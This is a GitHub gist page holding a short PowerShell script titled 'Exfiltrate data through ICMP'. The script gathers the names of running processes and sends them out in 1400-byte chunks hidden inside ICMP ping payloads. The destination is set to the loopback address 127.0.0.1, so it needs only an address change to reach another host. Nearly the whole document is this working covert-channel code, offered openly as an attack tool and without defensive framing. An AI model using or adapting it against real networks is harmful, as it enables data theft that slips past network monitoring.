Skip to content

Instantly share code, notes, and snippets.

@FrankSpierings

FrankSpierings/IcmpExfiltrate.ps1

Last active May 4, 2019 15:09
Show Gist options
  • Save FrankSpierings/97104cfba4b28c77f3e30981bc39b68e to your computer and use it in GitHub Desktop.
Save FrankSpierings/97104cfba4b28c77f3e30981bc39b68e to your computer and use it in GitHub Desktop.
Download ZIP
Powershell - Exfiltrate data through ICMP
Raw
IcmpExfiltrate.ps1
$dst = "127.0.0.1";
$data = Get-Process | Select-Object -ExpandProperty Name | Out-String ;
$data = [System.Text.Encoding]::Ascii.GetBytes($data);
$options =(New-Object System.Net.NetworkInformation.PingOptions(64, $true));
$blocksize = 1400;
for($i=0; $i -lt $data.Length; $i+=$blocksize) {
$block = $data[$i..($i + $blocksize -1)];
(New-Object System.Net.NetworkInformation.Ping).Send($dst, 10, $block, $options);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment